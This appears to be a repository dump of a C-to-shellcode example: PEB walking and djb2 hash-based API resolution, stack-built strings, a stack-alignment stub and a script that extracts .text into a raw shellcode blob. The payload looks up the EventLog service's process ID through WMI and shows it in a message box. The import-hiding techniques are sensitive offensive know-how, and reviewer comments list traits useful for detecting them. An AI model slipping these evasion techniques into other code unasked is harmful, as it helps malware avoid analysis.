- https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/

--------------------------------------------------------------------------------
/WMI_get_pid_service_evt/APIResolve.h:
--------------------------------------------------------------------------------
// Declarations shared by ApiResolve.c and WMI_get_pid_service_evt.c: the
// getFunctionPtr() resolver, the HASH_* constants it matches against, the
// function-pointer typedefs the sample calls through, and private copies of the
// loader structures the PEB walk needs. Nothing here is an imported symbol:
// every API is located at run time by hash, which is the property that keeps
// the compiled .text free of an import table and of plaintext API names.
#pragma once

// NOTE(review): the header name was lost in rendering; uint64_t is used below,
// so presumably <stdint.h>.
#include 
#include "windows.h"
#include "wininet.h"

// Return codes used throughout the sample. FAIL doubles as the "not found"
// value of getFunctionPtr(), so callers test resolved pointers against 0x00.
#define FAIL 0
#define SUCCESS 1

// getFunctionPtr(dll_hash, function_hash): dll_hash is the djb2 of the
// lower-cased module base name (e.g. "user32.dll"), function_hash the djb2 of
// the export name as spelled in the export table. Returns the export's absolute
// address or 0. Defined in ApiResolve.c. unsigned long is 32 bits on the Win64
// (LLP64) ABI, which is why the constants below are 32-bit values.
uint64_t getFunctionPtr(unsigned long, unsigned long);

// ---- KERNEL32 ----
#define HASH_KERNEL32 0x7040ee75
#define HASH_LOADLIBRARYA 0x5fbff0fb
#define HASH_LSTRCMPW 0xd2bfde01

typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR);
typedef int(WINAPI* LSTRCMPW)(LPCWSTR, LPCWSTR);

// ---- USER32 ----
#define HASH_USER32 0x5a6bd3f3
#define HASH_MESSAGEBOXA 0x384f14b4
#define HASH_WSPRINTFA 0xf898b8c3

typedef int(WINAPI* MESSAGEBOXA)(HWND, LPCSTR, LPCSTR, UINT);
typedef int(WINAPI* WSPRINTFA)(LPSTR, LPCSTR, ...);

// ---- shlwapi.dll ----
// StrStrA is what followExport() in ApiResolve.c uses to split forwarder
// strings at the '.'.
#define HASH_SHLWAPI 0xa70d9427
#define HASH_STRSTRA 0xfb62238

typedef PCSTR(WINAPI* STRSTRA)(PCSTR, PCSTR);

// ---- Ole32.dll ----
// NOTE(review): HASH_CONITIALIZEEX is a misspelling of CoInitializeEx;
// WMI_get_pid_service_evt.c uses the same spelling, so renaming touches both.
#define HASH_OLE32 0xf92c2394
#define HASH_CONITIALIZEEX 0xc1cd8ee6
#define HASH_COCREATEINSTANCE 0xbecc6920
#define HASH_COTASKMEMFREE 0xe4f194ab
#define HASH_COUNINITIALIZE 0x145f84c
#define HASH_COINITIALIZESECURITY 0x428dffe1

typedef HRESULT(WINAPI* COINITIALIZEEX)(LPVOID, DWORD);
typedef HRESULT(WINAPI* COCREATEINSTANCE)(REFCLSID, LPUNKNOWN, DWORD, REFIID, LPVOID*);
typedef void(WINAPI* COTASKMEMFREE)(LPVOID);
// NOTE(review): "()" is an unprototyped declaration in C; "(void)" would let the
// compiler check calls through this pointer.
typedef void(WINAPI* COUNINITIALIZE)();
typedef HRESULT (WINAPI* COINITIALIZESECURITY)( PSECURITY_DESCRIPTOR, LONG, SOLE_AUTHENTICATION_SERVICE*, void*, DWORD , DWORD ,void* , DWORD , void* );

// ---- Oleaut32.dll ----
#define HASH_OLEAUT32 0xe6ab711e
#define HASH_SYSALLOCSTRING 0x785668a6
#define HASH_SYSFREESTRING 0x8d88867d

typedef BSTR(WINAPI* SYSALLOCSTRING)(OLECHAR FAR*);
typedef void(WINAPI* SYSFREESTRING)(BSTR);

// Private copies of loader structures. These are undocumented, version
// dependent layouts; ApiResolve.c only relies on the few fields it reads
// (pLdr, InMemoryOrderModuleList, DllBase, BaseDllName).
typedef struct _UNICODE_STR {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR pBuffer;
} UNICODE_STR, * PUNICODE_STR;

typedef struct _PEB_LDR_DATA
{
    DWORD dwLength;
    DWORD dwInitialized;
    LPVOID lpSsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;

// Deliberately starts at InMemoryOrderModuleList rather than at the load-order
// links, so that a Flink taken from PEB_LDR_DATA.InMemoryOrderModuleList can be
// cast straight to this struct (see getDllBase in ApiResolve.c).
typedef struct _LDR_DATA_TABLE_ENTRY
{
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STR FullDllName;
    UNICODE_STR BaseDllName;
    ULONG Flags;
    SHORT LoadCount;
    SHORT TlsIndex;
    LIST_ENTRY HashTableEntry;
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;

//redefine PEB_FREE_BLOCK struct
typedef struct _PEB_FREE_BLOCK
{
    struct _PEB_FREE_BLOCK* pNext;
    DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;

//redefine PEB struct
// In a 64-bit build the four BYTEs plus padding and two pointers put pLdr at
// offset 0x18, the only member ApiResolve.c dereferences.
// NOTE(review): many members after pLdr are DWORD where the real 64-bit PEB
// holds pointers, so their offsets should not be trusted without checking.
// NOTE(review): __PEB, _PEB and _PPEB are reserved identifiers (leading double
// underscore / underscore + upper-case, C11 7.1.3).
typedef struct __PEB
{
    BYTE bInheritedAddressSpace;
    BYTE bReadImageFileExecOptions;
    BYTE bBeingDebugged;
    BYTE bSpareBool;
    LPVOID lpMutant;
    LPVOID lpImageBaseAddress;
    PPEB_LDR_DATA pLdr;
    LPVOID lpProcessParameters;
    LPVOID lpSubSystemData;
    LPVOID lpProcessHeap;
    PRTL_CRITICAL_SECTION pFastPebLock;
    LPVOID lpFastPebLockRoutine;
    LPVOID lpFastPebUnlockRoutine;
    DWORD dwEnvironmentUpdateCount;
    LPVOID lpKernelCallbackTable;
    DWORD dwSystemReserved;
    DWORD dwAtlThunkSListPtr32;
    PPEB_FREE_BLOCK pFreeList;
    DWORD dwTlsExpansionCounter;
    LPVOID lpTlsBitmap;
    DWORD dwTlsBitmapBits[2];
    LPVOID lpReadOnlySharedMemoryBase;
    LPVOID lpReadOnlySharedMemoryHeap;
    LPVOID lpReadOnlyStaticServerData;
    LPVOID lpAnsiCodePageData;
    LPVOID lpOemCodePageData;
    LPVOID lpUnicodeCaseTableData;
    DWORD dwNumberOfProcessors;
    DWORD dwNtGlobalFlag;
    LARGE_INTEGER liCriticalSectionTimeout;
    DWORD dwHeapSegmentReserve;
    DWORD dwHeapSegmentCommit;
    DWORD dwHeapDeCommitTotalFreeThreshold;
    DWORD dwHeapDeCommitFreeBlockThreshold;
    DWORD dwNumberOfHeaps;
    DWORD dwMaximumNumberOfHeaps;
    LPVOID lpProcessHeaps;
    LPVOID lpGdiSharedHandleTable;
    LPVOID lpProcessStarterHelper;
    DWORD dwGdiDCAttributeList;
    LPVOID lpLoaderLock;
    DWORD dwOSMajorVersion;
    DWORD dwOSMinorVersion;
    WORD wOSBuildNumber;
    WORD wOSCSDVersion;
    DWORD dwOSPlatformId;
    DWORD dwImageSubsystem;
    DWORD dwImageSubsystemMajorVersion;
    DWORD dwImageSubsystemMinorVersion;
    DWORD dwImageProcessAffinityMask;
    DWORD dwGdiHandleBuffer[34];
    LPVOID lpPostProcessInitRoutine;
    LPVOID lpTlsExpansionBitmap;
    DWORD dwTlsExpansionBitmapBits[32];
    DWORD dwSessionId;
    ULARGE_INTEGER liAppCompatFlags;
    ULARGE_INTEGER liAppCompatFlagsUser;
    LPVOID lppShimData;
    LPVOID lpAppCompatInfo;
    UNICODE_STR usCSDVersion;
    LPVOID lpActivationContextData;
    LPVOID lpProcessAssemblyStorageMap;
    LPVOID lpSystemDefaultActivationContextData;
    LPVOID lpSystemAssemblyStorageMap;
    DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;

--------------------------------------------------------------------------------
/WMI_get_pid_service_evt/ApiResolve.c:
--------------------------------------------------------------------------------
// Run-time API resolution for the WMI sample. Modules are located by walking
// the PEB loader list and exports by hashing their names, so the compiled code
// carries neither an import table nor plaintext API names. For anyone
// analysing or detecting code of this kind, those are the observable traits:
// a PEB read through gs:[0x60], a walk over InMemoryOrderModuleList that
// lower-cases module names in place, djb2 hashing of every export name of the
// target module, and LoadLibraryA calls with stack-built names.
#include "APIResolve.h"

static uint64_t getDllBase(unsigned long);
static uint64_t loadDll(unsigned long);
static uint64_t loadDll_byName(char*);
static uint64_t parseHdrForPtr(uint64_t, unsigned long);
static uint64_t followExport(char*, unsigned long);

static unsigned long djb2(unsigned char*);
static unsigned long unicode_djb2(const wchar_t* str);
static WCHAR* toLower(WCHAR* str);

// Resolve one export.
//   dll_hash       djb2 of the lower-cased module base name (HASH_KERNEL32, ...)
//   function_hash  djb2 of the export name as spelled in the export table
// Returns the export's absolute address, or FAIL (0) when the module is neither
// loaded nor one of the four loadDll() knows, or when no export name hashes to
// function_hash.
uint64_t
getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) {

    uint64_t dll_base = 0x00;
    uint64_t ptr_function = 0x00;

    dll_base = getDllBase(dll_hash);
    if (dll_base == 0) {
        // Not in the loader list yet: load it (only works for known hashes).
        dll_base = loadDll(dll_hash);
        if (dll_base == 0)
            return FAIL;
    }

    ptr_function = parseHdrForPtr(dll_base, function_hash);

    return ptr_function;

}

// Load a module by hash through LoadLibraryA, which is itself resolved from
// kernel32 by hash. Only user32, ole32, oleaut32 and shlwapi are known; any
// other dll_hash returns 0 without loading anything. The names are built as
// char arrays, presumably so the compiler emits them as immediate stores rather
// than .rdata literals (the README's "everything in .text" goal).
static uint64_t
loadDll(unsigned long dll_hash) {

    uint64_t kernel32_base = 0x00;
    uint64_t fptr_loadLibary = 0x00;
    uint64_t ptr_loaded_dll = 0x00;

    kernel32_base = getDllBase(HASH_KERNEL32);
    if (kernel32_base == 0x00)
        return FAIL;

    fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA);
    if (fptr_loadLibary == 0x00)
        return FAIL;

    if (dll_hash == HASH_USER32) {
        char dll_name[] = { 'U', 's', 'e', 'r', '3' ,'2' ,'.', 'd', 'l', 'l', 0x00 };
        ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name);
    } else if (dll_hash == HASH_OLE32) {
        char dll_name[] = { 'O', 'l', 'e', '3', '2', '.', 'd','l','l',0x00 };
        ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name);
    } else if (dll_hash == HASH_OLEAUT32) {
        char dll_name[] = { 'o', 'l', 'e', 'a', 'u', 't', '3','2', '.', 'd','l','l',0x00 };
        ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name);

    } else if (dll_hash == HASH_SHLWAPI) {
        char dll_name[] = { 'S', 'h', 'l', 'w', 'a', 'p', 'i', '.', 'd','l','l',0x00 };
        ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name);
    }

    return ptr_loaded_dll;

}

// Same as loadDll() for a caller-supplied name. Used by followExport() with the
// module part of a forwarder string, which carries no extension; LoadLibraryA's
// default extension handling is relied on to supply ".dll".
static uint64_t
loadDll_byName(char* dll_name) {

    uint64_t kernel32_base = 0x00;
    uint64_t fptr_loadLibary = 0x00;
    uint64_t ptr_loaded_dll = 0x00;

    kernel32_base = getDllBase(HASH_KERNEL32);
    if (kernel32_base == 0x00)
        return FAIL;

    fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA);
    if (fptr_loadLibary == 0x00)
        return FAIL;

    ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name);

    return ptr_loaded_dll;

}


// Walk dll_base's export directory and return the absolute address of the
// first export whose name hashes to function_hash, following forwarders via
// followExport(). Returns FAIL (0) when no name matches.
// NOTE(review): nothing checks that the module has an export directory; with
// data_dir->VirtualAddress == 0, export_dir aliases the DOS header and the
// three table pointers are read from it. Callers only pass system DLLs, but a
// guard on VirtualAddress/Size would make that failure explicit.
static uint64_t
parseHdrForPtr(uint64_t dll_base, unsigned long function_hash) {

    PIMAGE_NT_HEADERS nt_hdrs = NULL;
    PIMAGE_DATA_DIRECTORY data_dir = NULL;
    PIMAGE_EXPORT_DIRECTORY export_dir = NULL;

    uint32_t* ptr_exportadrtable = 0x00;
    uint32_t* ptr_namepointertable = 0x00;
    uint16_t* ptr_ordinaltable = 0x00;

    uint32_t idx_functions = 0x00;

    unsigned char* ptr_function_name = NULL;


    // e_lfanew locates the NT headers; every value read below is an RVA and
    // is rebased onto dll_base.
    nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew);
    data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress);

    ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions);
    ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames);
    ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals);

    // Named exports only; exports by ordinal alone are not reachable here.
    for (idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++) {

        ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]);
        if (djb2(ptr_function_name) == function_hash) {

            // Name index -> ordinal -> address-table slot.
            WORD nameord = ptr_ordinaltable[idx_functions];
            DWORD rva = ptr_exportadrtable[nameord];


            // An address inside the export directory itself is a forwarder
            // string (module name, '.', target name), not code.
            // NOTE(review): the upper bound uses <=; one past the directory
            // should be excluded (<).
            if (dll_base + rva >= dll_base + data_dir->VirtualAddress && dll_base + rva <= dll_base + data_dir->VirtualAddress + (uint64_t)data_dir->Size) {
                // This is a forwarded export

                char* ptr_forward = (char*)(dll_base + rva);
                return followExport(ptr_forward, function_hash);

            }


            return dll_base + rva;
        }

    }

    return FAIL;
}

// Resolve a forwarded export: copy the forwarder string, cut it at the first
// '.', treat the prefix as the module name and look function_hash up there.
// NOTE(review): the text after the '.' is discarded and the lookup reuses the
// caller's function_hash, so a forwarder that renames the export cannot be
// resolved this way.
// NOTE(review): if StrStrA() finds no '.' it returns NULL and the write below
// dereferences it.
// NOTE(review): i is uint8_t, so it wraps at 256 and never indexes past
// forward_dll[255]; a longer forwarder string is scrambled, not overflowed.
static uint64_t followExport(char* ptr_forward, unsigned long function_hash) {

    // StrStrA is itself resolved by hash (shlwapi is loaded on demand).
    uint64_t _StrStrA = getFunctionPtr(HASH_SHLWAPI, HASH_STRSTRA);

    if (_StrStrA == 0x00)
        return FAIL;

    char del[] = { '.', 0x00 };
    char forward_dll[MAX_PATH] = { 0 };
    uint8_t i = 0;
    uint64_t fwd_dll_base = 0x00, forwarded_export = 0x00;

    while (*ptr_forward)
        forward_dll[i++] = *ptr_forward++;

    // Terminate at the '.', leaving only the module name.
    *(char*)((STRSTRA)_StrStrA)(forward_dll, del) = 0x00;

    // forward_dll is hashed as written (original case, no extension) while
    // getDllBase() matches the lower-cased base name including its extension,
    // so this lookup presumably misses and loadDll_byName() does the work.
    fwd_dll_base = getDllBase(djb2((unsigned char*)forward_dll));
    if (fwd_dll_base == 0x00) {
        fwd_dll_base = loadDll_byName(forward_dll);
        if (fwd_dll_base == 0x00)
            return FAIL;
    }

    forwarded_export = parseHdrForPtr(fwd_dll_base, function_hash);

    return forwarded_export;

}

// Find a loaded module by the djb2 of its lower-cased base name and return its
// image base, or FAIL (0). Reads the PEB through gs:[0x60] (the 64-bit TEB's
// PEB pointer) and walks PEB_LDR_DATA.InMemoryOrderModuleList; each Flink is
// cast straight to LDR_DATA_TABLE_ENTRY, which works because APIResolve.h
// declares that struct starting at InMemoryOrderModuleList.
// Side effect worth knowing for forensics: toLower() rewrites every visited
// BaseDllName buffer in place, so after this runs the module names in the
// process's own loader data read as lower case.
static uint64_t
getDllBase(unsigned long dll_hash) {

    _PPEB ptr_peb = NULL;
    PPEB_LDR_DATA ptr_ldr_data = NULL;
    PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = NULL;
    PUNICODE_STR dll_name = NULL;

    ptr_peb = (_PEB*)__readgsqword(0x60);
    ptr_ldr_data = ptr_peb->pLdr;
    ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink;

    do {

        dll_name = &ptr_module_entry->BaseDllName;

        // An entry without a name buffer (presumably the list head once the
        // walk wraps around) ends the search.
        if (dll_name->pBuffer == NULL)
            return FAIL;

        if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash)
            return (uint64_t)ptr_module_entry->DllBase;

        ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink;

    // Also stops if the walk returns to the first entry.
    } while (ptr_module_entry != ptr_start_module);

    return FAIL;

}

// Bernstein djb2 over a NUL-terminated byte string (hash * 33 + c, seed 5381).
// unsigned long is 32 bits on the Win64 (LLP64) ABI, which is why the HASH_*
// constants in APIResolve.h are 32-bit values.
static unsigned long
djb2(unsigned char* str)
{
    unsigned long hash = 5381;
    int c;

    while ((c = *str++))
        hash = ((hash << 5) + hash) + c;

    return hash;
}

// djb2 over a NUL-terminated wide string. For ASCII input it yields the same
// value as djb2() on the narrow spelling, which is what lets a single HASH_*
// constant describe a module name whichever variant hashed it.
// Declared static at the top of the file; this definition without `static`
// inherits that internal linkage (C11 6.2.2p5).
unsigned long
unicode_djb2(const wchar_t* str)
{

    unsigned long hash = 5381;
    DWORD val;

    while (*str != 0) {
        val = (DWORD)*str++;
        hash = ((hash << 5) + hash) + val;
    }

    return hash;

}

// ASCII-only in-place lower-casing of a wide string (A-Z -> a-z, everything
// else untouched). Returns its argument. Mutates the caller's buffer — in this
// file that buffer belongs to the loader's LDR_DATA_TABLE_ENTRY.
static WCHAR*
toLower(WCHAR* str)
{

    WCHAR* start = str;

    while (*str) {

        if (*str <= L'Z' && *str >= 'A') {
            *str += 32;
        }

        str += 1;

    }

    return start;

}
--------------------------------------------------------------------------------
/WMI_get_pid_service_evt/WMI_get_pid_service_evt.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/WMI_get_pid_service_evt/WMI_get_pid_service_evt.bin
--------------------------------------------------------------------------------
/WMI_get_pid_service_evt/WMI_get_pid_service_evt.c:
--------------------------------------------------------------------------------
#include "windows.h"
#include "stdint.h"
#include "wbemidl.h"
#include "shobjidl.h"

#include "APIResolve.h"

#ifdef _DEBUG
int
main(int argc, char** argv) {
#else
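int go() {
#endif

    /*
     * Shellcode entry (go) / debug entry (main): query WMI for the process id
     * of the "EventLog" service and show it in a message box.
     *
     * Every API is resolved by hash at runtime (no import table). Returns
     * SUCCESS once the query loop has run to completion, FAIL otherwise.
     *
     * Fixes relative to the original:
     *  - CoUninitialize is only called when CoInitializeEx succeeded (the
     *    original also called it on the BSTR-allocation failure path, and
     *    leaked the BSTRs when CoInitializeEx failed).
     *  - RPC_E_TOO_LATE from CoInitializeSecurity is tolerated: when this runs
     *    inside a host that already initialised COM security, the call is
     *    expected to fail that way and the query still works.
     *  - Each IWbemClassObject and each BSTR returned by Get() is released;
     *    the original leaked one of each per enumerated service.
     *  - VARIANT types are checked before bstrVal/lVal are read.
     */

    COINITIALIZEEX _CoInitializeEx = (COINITIALIZEEX)getFunctionPtr(HASH_OLE32, HASH_CONITIALIZEEX);
    COCREATEINSTANCE _CoCreateinstance = (COCREATEINSTANCE)getFunctionPtr(HASH_OLE32, HASH_COCREATEINSTANCE);
    COINITIALIZESECURITY _CoInitializeSecurity = (COINITIALIZESECURITY)getFunctionPtr(HASH_OLE32, HASH_COINITIALIZESECURITY);
    COUNINITIALIZE _CoUnitialize = (COUNINITIALIZE)getFunctionPtr(HASH_OLE32, HASH_COUNINITIALIZE);
    SYSALLOCSTRING _SysAllocString = (SYSALLOCSTRING)getFunctionPtr(HASH_OLEAUT32, HASH_SYSALLOCSTRING);
    SYSFREESTRING _SysFreeString = (SYSFREESTRING)getFunctionPtr(HASH_OLEAUT32, HASH_SYSFREESTRING);
    LSTRCMPW _lstrcmpw = (LSTRCMPW)getFunctionPtr(HASH_KERNEL32, HASH_LSTRCMPW);

    WSPRINTFA _wsprintfA = (WSPRINTFA)getFunctionPtr(HASH_USER32, HASH_WSPRINTFA);
    MESSAGEBOXA _MessageBoxA = (MESSAGEBOXA)getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA);

    if (_CoInitializeEx == 0x00 || _CoCreateinstance == 0x00 || _CoInitializeSecurity == 0x00 || _CoUnitialize == 0x00 ||
        _SysAllocString == 0x00 || _SysFreeString == 0x00 || _lstrcmpw == NULL || _MessageBoxA == 0x00 || _wsprintfA == 0x00)
        return FAIL;

    /* CLSID_WbemLocator / IID_IWbemLocator, spelled out so nothing lands in .rdata. */
    GUID _CLSID_WbemLocator = { 0x4590f811, 0x1d3a, 0x11d0 , { 0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } };
    IID _IID_IWbemLocator = { 0xdc12a687, 0x737f, 0x11cf , { 0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24 } };

    /* Strings are built on the stack as char arrays for the same reason. The
       query text is fixed at compile time: no caller-controlled input reaches WQL. */
    wchar_t w_server[] = { 'R', 'O', 'O', 'T', '\\', 'C', 'I', 'M', 'V', '2', 0x00 };
    wchar_t w_wql[] = { 'W', 'Q', 'L', 0x00 };
    wchar_t w_query[] = { 's', 'e', 'l', 'e', 'c', 't', ' ', 'n', 'a', 'm', 'e', ',', 'p', 'r', 'o', 'c', 'e', 's', 's', 'i', 'd', ' ', 'f', 'r', 'o', 'm',
                          ' ', 'W', 'i', 'n', '3', '2', '_', 'S', 'e', 'r', 'v', 'i', 'c', 'e', 0x00 };
    wchar_t w_nameservice[] = { 'E', 'v', 'e', 'n', 't', 'L', 'o', 'g', 0x00 };
    wchar_t w_column_name[] = { 'n', 'a', 'm', 'e', 0x00 };
    wchar_t w_column_processid[] = { 'p', 'r', 'o', 'c', 'e', 's', 's', 'i', 'd', 0x00 };

    BSTR bstr_server = NULL;
    BSTR bstr_wql = NULL;
    BSTR bstr_query = NULL;

    HRESULT h_res = 0;
    IWbemLocator* p_loc = NULL;
    IWbemServices* p_svc = NULL;
    IEnumWbemClassObject* p_enumerator = NULL;
    IWbemClassObject* p_cls_obj = NULL;
    VARIANT vt_prop;
    ULONG u_return = 0x00;
    DWORD dw_success = FAIL;
    BOOL com_initialized = FALSE;
    uint32_t pid_eventservice = 0x00;

    vt_prop.vt = VT_EMPTY;

    h_res = _CoInitializeEx(0, COINIT_MULTITHREADED);
    if (FAILED(h_res))
        goto cleanup;
    /* S_FALSE (already initialised on this thread) still needs a matching CoUninitialize. */
    com_initialized = TRUE;

    /* Process-wide, one-shot call: a host that already did this answers
       RPC_E_TOO_LATE, which is not a reason to abort. Impersonate is the level
       the standard WMI client samples use. */
    h_res = _CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
    if (FAILED(h_res) && h_res != RPC_E_TOO_LATE)
        goto cleanup;

    bstr_server = _SysAllocString(w_server);
    bstr_wql = _SysAllocString(w_wql);
    bstr_query = _SysAllocString(w_query);

    if (bstr_server == NULL || bstr_wql == NULL || bstr_query == NULL)
        goto cleanup;

    h_res = _CoCreateinstance(&_CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, &_IID_IWbemLocator, (LPVOID*)&p_loc);
    if (FAILED(h_res))
        goto cleanup;

    h_res = p_loc->lpVtbl->ConnectServer(p_loc, bstr_server, NULL, NULL, 0, 0, 0, 0, &p_svc);
    if (FAILED(h_res))
        goto cleanup;

    h_res = p_svc->lpVtbl->ExecQuery(p_svc, bstr_wql, bstr_query, WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &p_enumerator);
    if (FAILED(h_res))
        goto cleanup;

    while (p_enumerator) {

        h_res = p_enumerator->lpVtbl->Next(p_enumerator, WBEM_INFINITE, 1, &p_cls_obj, &u_return);
        if (FAILED(h_res))
            goto cleanup;

        if (u_return == 0x00)
            break;

        h_res = p_cls_obj->lpVtbl->Get(p_cls_obj, w_column_name, 0, &vt_prop, 0, 0);
        if (FAILED(h_res))
            goto cleanup;

        /* Name may come back as VT_NULL; only a real BSTR is comparable. */
        int is_match = (vt_prop.vt == VT_BSTR && vt_prop.bstrVal != NULL &&
                        _lstrcmpw(vt_prop.bstrVal, w_nameservice) == 0);

        /* Get() hands us ownership of the BSTR; free it (VariantClear would do the same for VT_BSTR). */
        if (vt_prop.vt == VT_BSTR && vt_prop.bstrVal != NULL)
            _SysFreeString(vt_prop.bstrVal);
        vt_prop.vt = VT_EMPTY;

        if (is_match) {

            h_res = p_cls_obj->lpVtbl->Get(p_cls_obj, w_column_processid, 0, &vt_prop, 0, 0);
            if (FAILED(h_res))
                goto cleanup;

            /* Win32_Service.ProcessId is a uint32, delivered as VT_I4; 0 if the service is not running. */
            if (vt_prop.vt == VT_I4)
                pid_eventservice = (uint32_t)vt_prop.lVal;
            else if (vt_prop.vt == VT_UI4)
                pid_eventservice = vt_prop.ulVal;
            vt_prop.vt = VT_EMPTY;

            char c_pid[512] = { 0x00 };
            char c_fmt[] = { '0', 'x', '%', 'x', 0x00 };

            _wsprintfA(c_pid, c_fmt, pid_eventservice);

            _MessageBoxA(0, c_pid, c_pid, 1);

            break;

        }

        /* Done with this instance; the original never released it. */
        p_cls_obj->lpVtbl->Release(p_cls_obj);
        p_cls_obj = NULL;

    }

    dw_success = SUCCESS;

cleanup:

    /* Release in reverse order of acquisition. */
    if (p_cls_obj != NULL)
        p_cls_obj->lpVtbl->Release(p_cls_obj);

    if (p_enumerator != NULL)
        p_enumerator->lpVtbl->Release(p_enumerator);

    if (p_svc != NULL)
        p_svc->lpVtbl->Release(p_svc);

    if (p_loc != NULL)
        p_loc->lpVtbl->Release(p_loc);

    if (bstr_query != NULL)
        _SysFreeString(bstr_query);

    if (bstr_wql != NULL)
        _SysFreeString(bstr_wql);

    if (bstr_server != NULL)
        _SysFreeString(bstr_server);

    /* Only balance a CoInitializeEx that actually succeeded. */
    if (com_initialized)
        _CoUnitialize();

    return dw_success;

}
--------------------------------------------------------------------------------
/WMI_get_pid_service_evt/adjuststack.asm:
--------------------------------------------------------------------------------
; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/
extern go
global alignstack

segment .text

alignstack:
    push rdi                ; backup rdi since we will be using this as our main register
    mov rdi, rsp            ; save stack pointer to rdi
    and rsp, byte -0x10     ; align stack with 16 bytes
    sub rsp, byte +0x20     ; allocate some space for our C function (the 32-byte shadow space the Win64 ABI expects the callee to own)
    call go                 ; call the C function
    mov rsp, rdi            ; restore stack pointer
    pop rdi                 ; restore rdi
    ret                     ; return where we left; rax (go's return value) is passed through untouched
--------------------------------------------------------------------------------
/WMI_get_pid_service_evt/extract.sh:
--------------------------------------------------------------------------------
#!/bin/bash
for i in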
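$(objdump -d WMI_get_pid_service_evt.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done > WMI_get_pid_service_evt.bin
# '>' rather than the original '>>': a rebuild must replace the blob. Appending
# silently glued a second copy of the code onto the previous one, so anything
# loading the .bin got a blob twice the expected size.
# objdump -d walks only code sections, so any data the compiler placed in
# .rdata/.data is not captured. The sources build their strings as stack
# arrays to avoid that; confirm with `objdump -h WMI_get_pid_service_evt.exe`
# that the linked image has no .rdata/.data before trusting the blob.
--------------------------------------------------------------------------------
/WMI_get_pid_service_evt/makefile:
--------------------------------------------------------------------------------
# based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/
#
# Note: the original compile lines carried -Wl,-Tlinker.ld,--no-seh. With -c no
# linker runs, so those options were never applied, the ld line below does not
# use them either, and there is no linker.ld in this tree. They are dropped here
# so the build does not suggest a linker script that is not in effect.
# Section order in the final .text is therefore link order: adjuststack.o is
# first so the extracted blob is expected to begin at alignstack (entry is
# set to go only for the .exe itself).
make:
	nasm -f win64 adjuststack.asm -o adjuststack.o
	x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o
	x86_64-w64-mingw32-gcc WMI_get_pid_service_evt.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o WMI_get_pid_service_evt.o
	x86_64-w64-mingw32-ld -e go -s adjuststack.o ApiResolve.o WMI_get_pid_service_evt.o -o WMI_get_pid_service_evt.exe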